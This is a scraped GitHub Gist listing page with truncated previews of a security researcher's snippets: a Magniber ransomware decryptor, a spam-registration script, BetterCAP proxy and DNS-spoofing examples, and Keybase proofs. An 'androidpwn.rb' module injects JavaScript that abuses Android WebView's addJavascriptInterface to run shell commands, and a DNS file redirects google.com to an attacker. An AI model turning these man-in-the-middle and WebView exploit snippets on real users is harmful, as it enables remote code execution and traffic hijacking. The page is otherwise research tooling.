Skip to content

Instantly share code, notes, and snippets.

View magniber_decryptor.cpp
/*
* This tool will decrypt files encrypted by the Magniber ransomware with
* AES128 ( CBC mode ) algorithm.
*
* RE and report by MalwareBytes ( @hasherezade )
*
* https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/
*
* Decryptor written by Simone 'evilsocket' Margaritelli
*
@evilsocket
evilsocket / spam_yuanopen.go
Last active Mar 21, 2021
registers random users to a spam&scam network that's targeting EU
View spam_yuanopen.go
package main
import (
"encoding/json"
"fmt"
"io/ioutil"
"math/rand"
"net/http"
"net/url"
"strings"
@evilsocket
evilsocket / example.rb
Last active Sep 1, 2020
BetterCAP example TCP Proxy Module
View example.rb
class Example < BetterCap::Proxy::TCP::Module
meta(
'Name' => 'Example',
'Description' => 'Example TCP proxy module.',
'Version' => '1.0.0',
'Author' => "Simone 'evilsocket' Margaritelli",
'License' => 'GPL3'
)
# Received when the victim is sending data to the upstream server.
View keybase.md

Keybase proof

I hereby claim:

  • I am evilsocket on github.
  • I am evilsocket (https://keybase.io/evilsocket) on keybase.
  • I have a public key ASDQOex7WfTVV8cumbapyzHyv-NXXay_D0-RfJwOH8xKrQo

To claim this, I am signing this object:

@evilsocket
evilsocket / piping.sh
Created Jun 8, 2015
Periodically scan your network searching for your Raspberry Pi board and update your /etc/hosts file with its ip address.
View piping.sh
#!/bin/bash
#
# Periodically scan your network searching for your
# Raspberry Pi board and update your /etc/hosts file
# with its ip address.
#
# Copyleft by Simone 'evilsocket' Margaritelli
# http://www.evilsocket.net
# evilsocket at gmail dot com
#
View androidpwn.rb
class AndroidPwn < BetterCap::Proxy::Module
@@command = nil
@@payload = "<script>\n" +
"var command = ['/system/bin/sh','-c','COMMAND_HERE'];\n" +
"for(i in top) {\n" +
" try {\n" +
" top[i].getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(cmd);\n" +
" break;\n" +
" }\n" +
"catch(e) {}\n" +
@evilsocket
evilsocket / dns.conf
Created Mar 16, 2016
BetterCAP example DNS server redirection file.
View dns.conf
# Empty lines or lines starting with # will be ignored.
# redirect *.google.com to the attacker ip address
local .*google\.com
# redirect *.microsoft.com to 10.10.10.10
10.10.10.10 .*microsoft\.com
@evilsocket
evilsocket / hack_title.rb
Last active May 16, 2018
BetterCAP example HTTP(S) Proxy Module
View hack_title.rb
class HackTitle < BetterCap::Proxy::HTTP::Module
meta(
'Name' => 'HackTitle',
'Description' => 'Adds a "!!! HACKED !!!" string to every webpage title.',
'Version' => '1.0.0',
'Author' => "Simone 'evilsocket' Margaritelli",
'License' => 'GPL3'
)
# called before the request is performed
View jsinterface.java
public class WebViewGUI extends Activity {
WebView mWebView;
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
mWebView=new WebView(this);
mWebView.getSettings().setJavaScriptEnabled(true);
mWebView.addJavascriptInterface(new JavaScriptInterface(), "jsinterface");
mWebView.loadUrl("file:///android_asset/www/index.html");
setContentView(mWebView);
}
View keybase.md

Keybase proof

I hereby claim:

  • I am evilsocket on github.
  • I am evilsocket (https://keybase.io/evilsocket) on keybase.
  • I have a public key whose fingerprint is 7F1A D5FA 2A51 87DF DD53 DDA9 1564 D7F3 0393 A456

To claim this, I am signing this object: